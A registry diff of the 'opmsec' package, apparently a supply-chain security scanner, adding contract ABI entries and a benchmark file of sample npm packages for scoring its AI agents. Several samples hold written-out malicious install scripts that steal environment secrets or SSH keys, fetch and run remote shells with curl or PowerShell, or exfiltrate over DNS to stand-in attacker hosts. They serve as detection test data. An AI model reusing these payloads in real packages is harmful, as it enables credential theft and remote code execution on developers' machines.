opmsec 0.1.0 → 0.1.4

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (152) hide show
  1. package/.env.example +23 -13
  2. package/.husky/pre-commit +1 -0
  3. package/README.md +256 -173
  4. package/bun.lock +4 -4
  5. package/docs/architecture/agents.mdx +77 -0
  6. package/docs/architecture/benchmarks.mdx +65 -0
  7. package/docs/architecture/overview.mdx +58 -0
  8. package/docs/architecture/scanner.mdx +53 -0
  9. package/docs/cli/audit.mdx +35 -0
  10. package/docs/cli/check.mdx +44 -0
  11. package/docs/cli/fix.mdx +49 -0
  12. package/docs/cli/info.mdx +44 -0
  13. package/docs/cli/install.mdx +71 -0
  14. package/docs/cli/push.mdx +99 -0
  15. package/docs/cli/register-agent.mdx +80 -0
  16. package/docs/cli/view.mdx +52 -0
  17. package/docs/concepts/multi-agent-consensus.mdx +58 -0
  18. package/docs/concepts/on-chain-registry.mdx +74 -0
  19. package/docs/concepts/security-model.mdx +76 -0
  20. package/docs/concepts/zk-agent-verification.mdx +82 -0
  21. package/docs/configuration.mdx +82 -0
  22. package/docs/contract/deployment.mdx +57 -0
  23. package/docs/contract/events.mdx +115 -0
  24. package/docs/contract/functions.mdx +220 -0
  25. package/docs/contract/overview.mdx +58 -0
  26. package/docs/favicon.svg +5 -0
  27. package/docs/introduction.mdx +43 -0
  28. package/docs/logo/dark.svg +5 -0
  29. package/docs/logo/light.svg +5 -0
  30. package/docs/mint.json +106 -0
  31. package/docs/quickstart.mdx +133 -0
  32. package/package.json +7 -6
  33. package/packages/cli/src/commands/author-view.tsx +9 -1
  34. package/packages/cli/src/commands/check.tsx +318 -0
  35. package/packages/cli/src/commands/fix.tsx +294 -0
  36. package/packages/cli/src/commands/install.tsx +501 -47
  37. package/packages/cli/src/commands/push.tsx +53 -22
  38. package/packages/cli/src/commands/register-agent.tsx +227 -0
  39. package/packages/cli/src/components/AgentScores.tsx +20 -6
  40. package/packages/cli/src/components/Hyperlink.tsx +30 -0
  41. package/packages/cli/src/components/ScanReport.tsx +3 -2
  42. package/packages/cli/src/index.tsx +44 -6
  43. package/packages/cli/src/services/avatar.ts +43 -6
  44. package/packages/cli/src/services/chainpatrol.ts +20 -17
  45. package/packages/cli/src/services/contract.ts +41 -8
  46. package/packages/cli/src/services/ens.ts +3 -5
  47. package/packages/cli/src/services/fileverse.ts +12 -13
  48. package/packages/cli/src/services/typosquat.ts +166 -0
  49. package/packages/cli/src/services/version.ts +156 -5
  50. package/packages/contracts/circuits/accuracy_verifier.circom +101 -0
  51. package/packages/contracts/contracts/OPMRegistry.sol +63 -0
  52. package/packages/contracts/scripts/deploy.ts +22 -3
  53. package/packages/core/src/abi.ts +221 -0
  54. package/packages/core/src/benchmarks.ts +450 -0
  55. package/packages/core/src/constants.ts +20 -0
  56. package/packages/core/src/index.ts +2 -0
  57. package/packages/core/src/model-rankings.ts +115 -0
  58. package/packages/core/src/prompt.ts +58 -0
  59. package/packages/core/src/types.ts +41 -0
  60. package/packages/core/src/utils.ts +142 -3
  61. package/packages/scanner/src/agents/base-agent.ts +13 -3
  62. package/packages/scanner/src/index.ts +5 -2
  63. package/packages/scanner/src/queue/memory-queue.ts +8 -3
  64. package/packages/scanner/src/services/benchmark-runner.ts +114 -0
  65. package/packages/scanner/src/services/contract-writer.ts +2 -3
  66. package/packages/scanner/src/services/fileverse.ts +26 -7
  67. package/packages/scanner/src/services/openrouter.ts +61 -4
  68. package/packages/scanner/src/services/report-formatter.ts +122 -3
  69. package/packages/scanner/src/services/zk-verifier.ts +118 -0
  70. package/packages/web/.next/BUILD_ID +1 -0
  71. package/packages/web/.next/app-build-manifest.json +26 -0
  72. package/packages/web/.next/app-path-routes-manifest.json +4 -0
  73. package/packages/web/.next/build-manifest.json +33 -0
  74. package/packages/web/.next/diagnostics/build-diagnostics.json +6 -0
  75. package/packages/web/.next/diagnostics/framework.json +1 -0
  76. package/packages/web/.next/export-marker.json +6 -0
  77. package/packages/web/.next/images-manifest.json +58 -0
  78. package/packages/web/.next/next-minimal-server.js.nft.json +1 -0
  79. package/packages/web/.next/next-server.js.nft.json +1 -0
  80. package/packages/web/.next/package.json +1 -0
  81. package/packages/web/.next/prerender-manifest.json +61 -0
  82. package/packages/web/.next/react-loadable-manifest.json +1 -0
  83. package/packages/web/.next/required-server-files.json +320 -0
  84. package/packages/web/.next/routes-manifest.json +53 -0
  85. package/packages/web/.next/server/app/_not-found/page.js +2 -0
  86. package/packages/web/.next/server/app/_not-found/page.js.nft.json +1 -0
  87. package/packages/web/.next/server/app/_not-found/page_client-reference-manifest.js +1 -0
  88. package/packages/web/.next/server/app/_not-found.html +1 -0
  89. package/packages/web/.next/server/app/_not-found.meta +8 -0
  90. package/packages/web/.next/server/app/_not-found.rsc +16 -0
  91. package/packages/web/.next/server/app/index.html +1 -0
  92. package/packages/web/.next/server/app/index.meta +7 -0
  93. package/packages/web/.next/server/app/index.rsc +20 -0
  94. package/packages/web/.next/server/app/page.js +2 -0
  95. package/packages/web/.next/server/app/page.js.nft.json +1 -0
  96. package/packages/web/.next/server/app/page_client-reference-manifest.js +1 -0
  97. package/packages/web/.next/server/app-paths-manifest.json +4 -0
  98. package/packages/web/.next/server/chunks/611.js +6 -0
  99. package/packages/web/.next/server/chunks/778.js +30 -0
  100. package/packages/web/.next/server/functions-config-manifest.json +4 -0
  101. package/packages/web/.next/server/interception-route-rewrite-manifest.js +1 -0
  102. package/packages/web/.next/server/middleware-build-manifest.js +1 -0
  103. package/packages/web/.next/server/middleware-manifest.json +6 -0
  104. package/packages/web/.next/server/middleware-react-loadable-manifest.js +1 -0
  105. package/packages/web/.next/server/next-font-manifest.js +1 -0
  106. package/packages/web/.next/server/next-font-manifest.json +1 -0
  107. package/packages/web/.next/server/pages/404.html +1 -0
  108. package/packages/web/.next/server/pages/500.html +1 -0
  109. package/packages/web/.next/server/pages/_app.js +1 -0
  110. package/packages/web/.next/server/pages/_app.js.nft.json +1 -0
  111. package/packages/web/.next/server/pages/_document.js +1 -0
  112. package/packages/web/.next/server/pages/_document.js.nft.json +1 -0
  113. package/packages/web/.next/server/pages/_error.js +19 -0
  114. package/packages/web/.next/server/pages/_error.js.nft.json +1 -0
  115. package/packages/web/.next/server/pages-manifest.json +6 -0
  116. package/packages/web/.next/server/server-reference-manifest.js +1 -0
  117. package/packages/web/.next/server/server-reference-manifest.json +1 -0
  118. package/packages/web/.next/server/webpack-runtime.js +1 -0
  119. package/packages/web/.next/static/2XIFCTTKVZwN_RsNE-Rrr/_buildManifest.js +1 -0
  120. package/packages/web/.next/static/2XIFCTTKVZwN_RsNE-Rrr/_ssgManifest.js +1 -0
  121. package/packages/web/.next/static/chunks/255-0dc49b7a6e8e5c05.js +1 -0
  122. package/packages/web/.next/static/chunks/4bd1b696-382748cc942d8a14.js +1 -0
  123. package/packages/web/.next/static/chunks/app/_not-found/page-0da542be7eb33a64.js +1 -0
  124. package/packages/web/.next/static/chunks/app/layout-28a489fb4398663f.js +1 -0
  125. package/packages/web/.next/static/chunks/app/page-e58ccdb78625bce6.js +1 -0
  126. package/packages/web/.next/static/chunks/framework-ac73abd125e371fe.js +1 -0
  127. package/packages/web/.next/static/chunks/main-app-dd261207182e5a23.js +1 -0
  128. package/packages/web/.next/static/chunks/main-ee293fa6aa18bdd1.js +1 -0
  129. package/packages/web/.next/static/chunks/pages/_app-7d307437aca18ad4.js +1 -0
  130. package/packages/web/.next/static/chunks/pages/_error-cb2a52f75f2162e2.js +1 -0
  131. package/packages/web/.next/static/chunks/polyfills-42372ed130431b0a.js +1 -0
  132. package/packages/web/.next/static/chunks/webpack-e1ae44446e7f7355.js +1 -0
  133. package/packages/web/.next/static/css/21d69157e271f2ab.css +3 -0
  134. package/packages/web/.next/trace +2 -0
  135. package/packages/web/.next/types/app/layout.ts +84 -0
  136. package/packages/web/.next/types/app/page.ts +84 -0
  137. package/packages/web/.next/types/cache-life.d.ts +141 -0
  138. package/packages/web/.next/types/package.json +1 -0
  139. package/packages/web/.next/types/routes.d.ts +57 -0
  140. package/packages/web/.next/types/validator.ts +61 -0
  141. package/packages/web/app/globals.css +75 -0
  142. package/packages/web/app/layout.tsx +26 -0
  143. package/packages/web/app/page.tsx +361 -0
  144. package/packages/web/bun.lock +300 -0
  145. package/packages/web/next-env.d.ts +6 -0
  146. package/packages/web/next.config.ts +5 -0
  147. package/packages/web/package.json +26 -0
  148. package/packages/web/postcss.config.mjs +8 -0
  149. package/packages/web/public/favicon.svg +5 -0
  150. package/packages/web/public/logo.svg +7 -0
  151. package/packages/web/tailwind.config.ts +48 -0
  152. package/packages/web/tsconfig.json +21 -0
@@ -625,5 +625,226 @@ export const OPM_REGISTRY_ABI = [
625
625
  "outputs": [],
626
626
  "stateMutability": "nonpayable",
627
627
  "type": "function"
628
+ },
629
+ {
630
+ "anonymous": false,
631
+ "inputs": [
632
+ {
633
+ "indexed": true,
634
+ "internalType": "address",
635
+ "name": "agent",
636
+ "type": "address"
637
+ },
638
+ {
639
+ "indexed": false,
640
+ "internalType": "string",
641
+ "name": "name",
642
+ "type": "string"
643
+ },
644
+ {
645
+ "indexed": false,
646
+ "internalType": "string",
647
+ "name": "model",
648
+ "type": "string"
649
+ },
650
+ {
651
+ "indexed": false,
652
+ "internalType": "bytes32",
653
+ "name": "systemPromptHash",
654
+ "type": "bytes32"
655
+ },
656
+ {
657
+ "indexed": false,
658
+ "internalType": "bytes32",
659
+ "name": "proofHash",
660
+ "type": "bytes32"
661
+ },
662
+ {
663
+ "indexed": false,
664
+ "internalType": "uint256",
665
+ "name": "timestamp",
666
+ "type": "uint256"
667
+ }
668
+ ],
669
+ "name": "AgentRegistered",
670
+ "type": "event"
671
+ },
672
+ {
673
+ "inputs": [
674
+ {
675
+ "internalType": "string",
676
+ "name": "name",
677
+ "type": "string"
678
+ },
679
+ {
680
+ "internalType": "string",
681
+ "name": "model",
682
+ "type": "string"
683
+ },
684
+ {
685
+ "internalType": "bytes32",
686
+ "name": "systemPromptHash",
687
+ "type": "bytes32"
688
+ },
689
+ {
690
+ "internalType": "bytes32",
691
+ "name": "proofHash",
692
+ "type": "bytes32"
693
+ }
694
+ ],
695
+ "name": "registerAgent",
696
+ "outputs": [],
697
+ "stateMutability": "nonpayable",
698
+ "type": "function"
699
+ },
700
+ {
701
+ "inputs": [
702
+ {
703
+ "internalType": "address",
704
+ "name": "agent",
705
+ "type": "address"
706
+ }
707
+ ],
708
+ "name": "getRegisteredAgent",
709
+ "outputs": [
710
+ {
711
+ "components": [
712
+ {
713
+ "internalType": "address",
714
+ "name": "agentAddress",
715
+ "type": "address"
716
+ },
717
+ {
718
+ "internalType": "string",
719
+ "name": "name",
720
+ "type": "string"
721
+ },
722
+ {
723
+ "internalType": "string",
724
+ "name": "model",
725
+ "type": "string"
726
+ },
727
+ {
728
+ "internalType": "bytes32",
729
+ "name": "systemPromptHash",
730
+ "type": "bytes32"
731
+ },
732
+ {
733
+ "internalType": "bytes32",
734
+ "name": "proofHash",
735
+ "type": "bytes32"
736
+ },
737
+ {
738
+ "internalType": "uint256",
739
+ "name": "registeredAt",
740
+ "type": "uint256"
741
+ },
742
+ {
743
+ "internalType": "bool",
744
+ "name": "active",
745
+ "type": "bool"
746
+ }
747
+ ],
748
+ "internalType": "struct OPMRegistry.RegisteredAgent",
749
+ "name": "",
750
+ "type": "tuple"
751
+ }
752
+ ],
753
+ "stateMutability": "view",
754
+ "type": "function"
755
+ },
756
+ {
757
+ "inputs": [],
758
+ "name": "getAgentCount",
759
+ "outputs": [
760
+ {
761
+ "internalType": "uint256",
762
+ "name": "",
763
+ "type": "uint256"
764
+ }
765
+ ],
766
+ "stateMutability": "view",
767
+ "type": "function"
768
+ },
769
+ {
770
+ "inputs": [
771
+ {
772
+ "internalType": "address",
773
+ "name": "agent",
774
+ "type": "address"
775
+ }
776
+ ],
777
+ "name": "revokeAgent",
778
+ "outputs": [],
779
+ "stateMutability": "nonpayable",
780
+ "type": "function"
781
+ },
782
+ {
783
+ "inputs": [
784
+ {
785
+ "internalType": "address",
786
+ "name": "",
787
+ "type": "address"
788
+ }
789
+ ],
790
+ "name": "registeredAgents",
791
+ "outputs": [
792
+ {
793
+ "internalType": "address",
794
+ "name": "agentAddress",
795
+ "type": "address"
796
+ },
797
+ {
798
+ "internalType": "string",
799
+ "name": "name",
800
+ "type": "string"
801
+ },
802
+ {
803
+ "internalType": "string",
804
+ "name": "model",
805
+ "type": "string"
806
+ },
807
+ {
808
+ "internalType": "bytes32",
809
+ "name": "systemPromptHash",
810
+ "type": "bytes32"
811
+ },
812
+ {
813
+ "internalType": "bytes32",
814
+ "name": "proofHash",
815
+ "type": "bytes32"
816
+ },
817
+ {
818
+ "internalType": "uint256",
819
+ "name": "registeredAt",
820
+ "type": "uint256"
821
+ },
822
+ {
823
+ "internalType": "bool",
824
+ "name": "active",
825
+ "type": "bool"
826
+ }
827
+ ],
828
+ "stateMutability": "view",
829
+ "type": "function"
830
+ },
831
+ {
832
+ "inputs": [
833
+ {
834
+ "internalType": "uint256",
835
+ "name": "",
836
+ "type": "uint256"
837
+ }
838
+ ],
839
+ "name": "agentRegistry",
840
+ "outputs": [
841
+ {
842
+ "internalType": "address",
843
+ "name": "",
844
+ "type": "address"
845
+ }
846
+ ],
847
+ "stateMutability": "view",
848
+ "type": "function"
628
849
  }
629
850
  ] as const;
@@ -0,0 +1,450 @@
1
+ import type { PackageMetadata, VersionHistoryEntry, SourceFile, KnownCVE } from './types';
2
+ import { buildUserPrompt } from './prompt';
3
+
4
+ export interface BenchmarkCase {
5
+ id: string;
6
+ category: 'clean' | 'typosquat' | 'malicious' | 'cve' | 'obfuscated' | 'exfiltration' | 'dependency_confusion';
7
+ description: string;
8
+ metadata: PackageMetadata;
9
+ versionHistory: VersionHistoryEntry[];
10
+ sourceFiles: SourceFile[];
11
+ knownCVEs: KnownCVE[];
12
+ expected: {
13
+ risk_level: 'LOW' | 'MEDIUM' | 'HIGH' | 'CRITICAL';
14
+ min_risk_score: number;
15
+ max_risk_score: number;
16
+ must_flag: string[];
17
+ };
18
+ }
19
+
20
+ export function generateBenchmarkDataset(): BenchmarkCase[] {
21
+ return [
22
+ {
23
+ id: 'bench-001-clean-utility',
24
+ category: 'clean',
25
+ description: 'Legitimate utility: pure string helpers with no side effects',
26
+ metadata: {
27
+ name: 'string-utils-helper',
28
+ version: '2.1.0',
29
+ description: 'Lightweight string manipulation utilities',
30
+ author: 'verified-dev',
31
+ license: 'MIT',
32
+ dependencies: {},
33
+ scripts: {},
34
+ },
35
+ versionHistory: [
36
+ { version: '2.0.0', published: '2024-06-01', depsChanged: 'none', filesChanged: 'minor', sizeDelta: '+200B', newMaintainer: false },
37
+ { version: '2.1.0', published: '2024-09-15', depsChanged: 'none', filesChanged: 'minor', sizeDelta: '+150B', newMaintainer: false },
38
+ ],
39
+ sourceFiles: [
40
+ {
41
+ path: 'index.js',
42
+ size: 420,
43
+ content: `"use strict";
44
+ module.exports.capitalize = (s) => s.charAt(0).toUpperCase() + s.slice(1);
45
+ module.exports.camelCase = (s) => s.replace(/-([a-z])/g, (_, c) => c.toUpperCase());
46
+ module.exports.kebabCase = (s) => s.replace(/([A-Z])/g, '-$1').toLowerCase();
47
+ module.exports.truncate = (s, len) => s.length > len ? s.slice(0, len) + '...' : s;`,
48
+ },
49
+ ],
50
+ knownCVEs: [],
51
+ expected: { risk_level: 'LOW', min_risk_score: 0, max_risk_score: 20, must_flag: [] },
52
+ },
53
+
54
+ {
55
+ id: 'bench-002-typosquat-lodash',
56
+ category: 'typosquat',
57
+ description: 'Typosquat of lodash: "lodahs" with credential exfiltration in postinstall',
58
+ metadata: {
59
+ name: 'lodahs',
60
+ version: '4.17.21',
61
+ description: 'Lodash modular utilities',
62
+ author: 'unknown',
63
+ license: 'MIT',
64
+ dependencies: {},
65
+ scripts: { postinstall: 'node setup.js' },
66
+ },
67
+ versionHistory: [
68
+ { version: '4.17.21', published: '2025-01-03', depsChanged: 'none', filesChanged: 'new package', sizeDelta: 'N/A', newMaintainer: true },
69
+ ],
70
+ sourceFiles: [
71
+ {
72
+ path: 'setup.js',
73
+ size: 310,
74
+ content: `const https = require('https');
75
+ const os = require('os');
76
+ const data = JSON.stringify({
77
+ h: os.hostname(), u: os.userInfo().username,
78
+ e: Object.keys(process.env).filter(k => k.match(/TOKEN|KEY|SECRET|PASS/i)).map(k => k + '=' + process.env[k])
79
+ });
80
+ const req = https.request({ hostname: 'collect.evil-analytics.xyz', port: 443, path: '/d', method: 'POST',
81
+ headers: { 'Content-Type': 'application/json' } }, () => {});
82
+ req.write(data); req.end();`,
83
+ },
84
+ {
85
+ path: 'index.js',
86
+ size: 50,
87
+ content: `module.exports = require('lodash');`,
88
+ },
89
+ ],
90
+ knownCVEs: [],
91
+ expected: { risk_level: 'CRITICAL', min_risk_score: 80, max_risk_score: 100, must_flag: ['typosquat', 'exfiltration', 'postinstall'] },
92
+ },
93
+
94
+ {
95
+ id: 'bench-003-env-exfiltration',
96
+ category: 'exfiltration',
97
+ description: 'Package that silently exfiltrates environment variables on import',
98
+ metadata: {
99
+ name: 'fast-config-loader',
100
+ version: '1.0.0',
101
+ description: 'Fast configuration loading for Node.js',
102
+ author: 'anon-publisher',
103
+ license: 'ISC',
104
+ dependencies: {},
105
+ scripts: {},
106
+ },
107
+ versionHistory: [
108
+ { version: '1.0.0', published: '2025-02-20', depsChanged: 'none', filesChanged: 'new package', sizeDelta: 'N/A', newMaintainer: true },
109
+ ],
110
+ sourceFiles: [
111
+ {
112
+ path: 'index.js',
113
+ size: 480,
114
+ content: `const http = require('http');
115
+ function loadConfig(path) { return require(path); }
116
+ const _e = Buffer.from(JSON.stringify(process.env)).toString('base64');
117
+ const _o = { hostname: '198.51.100.42', port: 8080, path: '/api/telemetry', method: 'POST',
118
+ headers: { 'Content-Type': 'text/plain', 'X-Session': Date.now().toString(36) } };
119
+ try { const r = http.request(_o, () => {}); r.write(_e); r.end(); } catch(e) {}
120
+ module.exports = { loadConfig };`,
121
+ },
122
+ ],
123
+ knownCVEs: [],
124
+ expected: { risk_level: 'CRITICAL', min_risk_score: 85, max_risk_score: 100, must_flag: ['exfiltration', 'network_calls', 'env_variables'] },
125
+ },
126
+
127
+ {
128
+ id: 'bench-004-obfuscated-payload',
129
+ category: 'obfuscated',
130
+ description: 'Heavily obfuscated code hiding a reverse shell',
131
+ metadata: {
132
+ name: 'perf-monitor-lite',
133
+ version: '0.9.1',
134
+ description: 'Lightweight performance monitoring',
135
+ author: 'dev-tools-org',
136
+ license: 'MIT',
137
+ dependencies: {},
138
+ scripts: { preinstall: 'node bootstrap.js' },
139
+ },
140
+ versionHistory: [
141
+ { version: '0.9.0', published: '2024-12-01', depsChanged: 'none', filesChanged: 'new package', sizeDelta: 'N/A', newMaintainer: true },
142
+ { version: '0.9.1', published: '2025-01-10', depsChanged: 'none', filesChanged: 'major', sizeDelta: '+15KB', newMaintainer: false },
143
+ ],
144
+ sourceFiles: [
145
+ {
146
+ path: 'bootstrap.js',
147
+ size: 650,
148
+ content: `var _0x4f2a = ['\\x63\\x68\\x69\\x6c\\x64\\x5f\\x70\\x72\\x6f\\x63\\x65\\x73\\x73',
149
+ '\\x65\\x78\\x65\\x63', '\\x63\\x75\\x72\\x6c\\x20\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f'];
150
+ (function() { var cp = require(_0x4f2a[0]);
151
+ cp[_0x4f2a[1]](_0x4f2a[2] + '\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x31\\x2e\\x31\\x2f\\x73\\x68\\x65\\x6c\\x6c' +
152
+ '\\x20\\x7c\\x20\\x62\\x61\\x73\\x68'); })();`,
153
+ },
154
+ {
155
+ path: 'index.js',
156
+ size: 100,
157
+ content: `module.exports.measure = (fn) => { const s = Date.now(); fn(); return Date.now() - s; };`,
158
+ },
159
+ ],
160
+ knownCVEs: [],
161
+ expected: { risk_level: 'CRITICAL', min_risk_score: 90, max_risk_score: 100, must_flag: ['obfuscated', 'process_spawn', 'preinstall'] },
162
+ },
163
+
164
+ {
165
+ id: 'bench-005-clean-math',
166
+ category: 'clean',
167
+ description: 'Legitimate math library with zero dependencies',
168
+ metadata: {
169
+ name: 'tiny-math-ops',
170
+ version: '3.2.1',
171
+ description: 'Tiny math operations library',
172
+ author: 'math-community',
173
+ license: 'MIT',
174
+ dependencies: {},
175
+ scripts: { test: 'node test.js' },
176
+ },
177
+ versionHistory: [
178
+ { version: '3.1.0', published: '2024-03-10', depsChanged: 'none', filesChanged: 'minor', sizeDelta: '+100B', newMaintainer: false },
179
+ { version: '3.2.0', published: '2024-07-20', depsChanged: 'none', filesChanged: 'minor', sizeDelta: '+80B', newMaintainer: false },
180
+ { version: '3.2.1', published: '2024-11-05', depsChanged: 'none', filesChanged: 'patch', sizeDelta: '+20B', newMaintainer: false },
181
+ ],
182
+ sourceFiles: [
183
+ {
184
+ path: 'index.js',
185
+ size: 350,
186
+ content: `"use strict";
187
+ exports.clamp = (n, min, max) => Math.min(Math.max(n, min), max);
188
+ exports.lerp = (a, b, t) => a + (b - a) * t;
189
+ exports.roundTo = (n, d) => { const m = Math.pow(10, d); return Math.round(n * m) / m; };
190
+ exports.isPrime = (n) => { if (n < 2) return false; for (let i = 2; i <= Math.sqrt(n); i++) if (n % i === 0) return false; return true; };
191
+ exports.factorial = (n) => n <= 1 ? 1 : n * exports.factorial(n - 1);`,
192
+ },
193
+ ],
194
+ knownCVEs: [],
195
+ expected: { risk_level: 'LOW', min_risk_score: 0, max_risk_score: 15, must_flag: [] },
196
+ },
197
+
198
+ {
199
+ id: 'bench-006-postinstall-shell',
200
+ category: 'malicious',
201
+ description: 'Package with postinstall that downloads and executes remote script',
202
+ metadata: {
203
+ name: 'react-dev-toolkit',
204
+ version: '1.0.2',
205
+ description: 'Developer tools for React applications',
206
+ author: 'anonymous',
207
+ license: 'MIT',
208
+ dependencies: {},
209
+ scripts: { postinstall: 'node scripts/init.js' },
210
+ },
211
+ versionHistory: [
212
+ { version: '1.0.0', published: '2025-03-01', depsChanged: 'none', filesChanged: 'new package', sizeDelta: 'N/A', newMaintainer: true },
213
+ { version: '1.0.2', published: '2025-03-02', depsChanged: 'none', filesChanged: 'minor', sizeDelta: '+2KB', newMaintainer: false },
214
+ ],
215
+ sourceFiles: [
216
+ {
217
+ path: 'scripts/init.js',
218
+ size: 280,
219
+ content: `const { execSync } = require('child_process');
220
+ const os = require('os');
221
+ const p = os.platform();
222
+ try {
223
+ if (p === 'linux' || p === 'darwin') {
224
+ execSync('curl -s https://cdn-pkg-setup.com/init.sh | bash', { stdio: 'ignore' });
225
+ } else {
226
+ execSync('powershell -c "iwr https://cdn-pkg-setup.com/init.ps1 | iex"', { stdio: 'ignore' });
227
+ }
228
+ } catch(e) {}`,
229
+ },
230
+ {
231
+ path: 'index.js',
232
+ size: 80,
233
+ content: `module.exports = {};`,
234
+ },
235
+ ],
236
+ knownCVEs: [],
237
+ expected: { risk_level: 'CRITICAL', min_risk_score: 85, max_risk_score: 100, must_flag: ['postinstall', 'process_spawn', 'network_calls'] },
238
+ },
239
+
240
+ {
241
+ id: 'bench-007-known-cve',
242
+ category: 'cve',
243
+ description: 'Package with known prototype pollution CVE',
244
+ metadata: {
245
+ name: 'deep-object-merge',
246
+ version: '1.3.0',
247
+ description: 'Deep merge objects recursively',
248
+ author: 'obj-utils',
249
+ license: 'MIT',
250
+ dependencies: {},
251
+ scripts: {},
252
+ },
253
+ versionHistory: [
254
+ { version: '1.2.0', published: '2024-01-15', depsChanged: 'none', filesChanged: 'minor', sizeDelta: '+50B', newMaintainer: false },
255
+ { version: '1.3.0', published: '2024-06-20', depsChanged: 'none', filesChanged: 'minor', sizeDelta: '+100B', newMaintainer: false },
256
+ ],
257
+ sourceFiles: [
258
+ {
259
+ path: 'index.js',
260
+ size: 300,
261
+ content: `function deepMerge(target, source) {
262
+ for (const key in source) {
263
+ if (source[key] && typeof source[key] === 'object') {
264
+ if (!target[key]) target[key] = {};
265
+ deepMerge(target[key], source[key]);
266
+ } else {
267
+ target[key] = source[key];
268
+ }
269
+ }
270
+ return target;
271
+ }
272
+ module.exports = deepMerge;`,
273
+ },
274
+ ],
275
+ knownCVEs: [
276
+ { id: 'GHSA-xxxx-yyyy-zzzz', summary: 'Prototype pollution via __proto__ in deep-object-merge allows attackers to inject properties into Object.prototype' },
277
+ ],
278
+ expected: { risk_level: 'HIGH', min_risk_score: 60, max_risk_score: 100, must_flag: ['prototype_pollution', 'cve'] },
279
+ },
280
+
281
+ {
282
+ id: 'bench-008-dependency-confusion',
283
+ category: 'dependency_confusion',
284
+ description: 'Public package shadowing internal @company scope with data exfiltration',
285
+ metadata: {
286
+ name: 'internal-auth-service',
287
+ version: '99.0.0',
288
+ description: 'Authentication service utilities',
289
+ author: 'unknown',
290
+ license: 'ISC',
291
+ dependencies: {},
292
+ scripts: { preinstall: 'node telemetry.js' },
293
+ },
294
+ versionHistory: [
295
+ { version: '99.0.0', published: '2025-02-28', depsChanged: 'none', filesChanged: 'new package', sizeDelta: 'N/A', newMaintainer: true },
296
+ ],
297
+ sourceFiles: [
298
+ {
299
+ path: 'telemetry.js',
300
+ size: 200,
301
+ content: `const dns = require('dns');
302
+ const os = require('os');
303
+ const pkg = require('./package.json');
304
+ const data = Buffer.from(JSON.stringify({ h: os.hostname(), p: pkg.name, v: pkg.version })).toString('hex');
305
+ dns.resolve(\`\${data.slice(0,60)}.exfil.attacker-domain.com\`, () => {});`,
306
+ },
307
+ {
308
+ path: 'index.js',
309
+ size: 40,
310
+ content: `module.exports = {};`,
311
+ },
312
+ ],
313
+ knownCVEs: [],
314
+ expected: { risk_level: 'CRITICAL', min_risk_score: 80, max_risk_score: 100, must_flag: ['dependency_confusion', 'exfiltration', 'preinstall'] },
315
+ },
316
+
317
+ {
318
+ id: 'bench-009-clean-validator',
319
+ category: 'clean',
320
+ description: 'Legitimate input validation library with established history',
321
+ metadata: {
322
+ name: 'form-input-check',
323
+ version: '5.0.2',
324
+ description: 'Input validation and sanitization',
325
+ author: 'validation-team',
326
+ license: 'MIT',
327
+ dependencies: {},
328
+ scripts: { test: 'jest' },
329
+ },
330
+ versionHistory: [
331
+ { version: '4.9.0', published: '2023-11-01', depsChanged: 'none', filesChanged: 'minor', sizeDelta: '+200B', newMaintainer: false },
332
+ { version: '5.0.0', published: '2024-03-15', depsChanged: 'none', filesChanged: 'major', sizeDelta: '+1KB', newMaintainer: false },
333
+ { version: '5.0.2', published: '2024-08-10', depsChanged: 'none', filesChanged: 'patch', sizeDelta: '+50B', newMaintainer: false },
334
+ ],
335
+ sourceFiles: [
336
+ {
337
+ path: 'index.js',
338
+ size: 500,
339
+ content: `"use strict";
340
+ const EMAIL_RE = /^[^\\s@]+@[^\\s@]+\\.[^\\s@]+$/;
341
+ const URL_RE = /^https?:\\/\\/[^\\s/$.?#].[^\\s]*$/;
342
+ exports.isEmail = (v) => typeof v === 'string' && EMAIL_RE.test(v);
343
+ exports.isURL = (v) => typeof v === 'string' && URL_RE.test(v);
344
+ exports.isNumeric = (v) => !isNaN(parseFloat(v)) && isFinite(v);
345
+ exports.sanitize = (v) => String(v).replace(/[<>&"']/g, (c) => ({ '<':'&lt;', '>':'&gt;', '&':'&amp;', '"':'&quot;', "'":'&#39;' }[c]));
346
+ exports.minLength = (v, n) => typeof v === 'string' && v.length >= n;
347
+ exports.maxLength = (v, n) => typeof v === 'string' && v.length <= n;`,
348
+ },
349
+ ],
350
+ knownCVEs: [],
351
+ expected: { risk_level: 'LOW', min_risk_score: 0, max_risk_score: 20, must_flag: [] },
352
+ },
353
+
354
+ {
355
+ id: 'bench-010-fs-read-exfil',
356
+ category: 'malicious',
357
+ description: 'Package that reads SSH keys and sends them to a remote server',
358
+ metadata: {
359
+ name: 'ssh-key-manager',
360
+ version: '2.0.0',
361
+ description: 'Manage SSH keys easily',
362
+ author: 'unknown-dev',
363
+ license: 'MIT',
364
+ dependencies: {},
365
+ scripts: {},
366
+ },
367
+ versionHistory: [
368
+ { version: '1.0.0', published: '2024-10-01', depsChanged: 'none', filesChanged: 'new package', sizeDelta: 'N/A', newMaintainer: true },
369
+ { version: '2.0.0', published: '2025-01-15', depsChanged: 'none', filesChanged: 'major', sizeDelta: '+3KB', newMaintainer: false },
370
+ ],
371
+ sourceFiles: [
372
+ {
373
+ path: 'index.js',
374
+ size: 420,
375
+ content: `const fs = require('fs');
376
+ const path = require('path');
377
+ const https = require('https');
378
+ const os = require('os');
379
+
380
+ function listKeys() {
381
+ const sshDir = path.join(os.homedir(), '.ssh');
382
+ if (!fs.existsSync(sshDir)) return [];
383
+ const files = fs.readdirSync(sshDir);
384
+ const keys = files.map(f => ({ name: f, content: fs.readFileSync(path.join(sshDir, f), 'utf-8') }));
385
+ const payload = Buffer.from(JSON.stringify(keys)).toString('base64');
386
+ https.get('https://telemetry-cdn.com/k?d=' + payload, () => {});
387
+ return files;
388
+ }
389
+
390
+ module.exports = { listKeys };`,
391
+ },
392
+ ],
393
+ knownCVEs: [],
394
+ expected: { risk_level: 'CRITICAL', min_risk_score: 85, max_risk_score: 100, must_flag: ['filesystem_access', 'exfiltration', 'network_calls'] },
395
+ },
396
+ ];
397
+ }
398
+
399
+ export function buildBenchmarkPrompt(bench: BenchmarkCase): string {
400
+ return buildUserPrompt(bench.metadata, bench.versionHistory, bench.sourceFiles, bench.knownCVEs);
401
+ }
402
+
403
+ export type BenchmarkVerdict = 'PASS' | 'FAIL';
404
+
405
+ export interface BenchmarkResult {
406
+ caseId: string;
407
+ category: string;
408
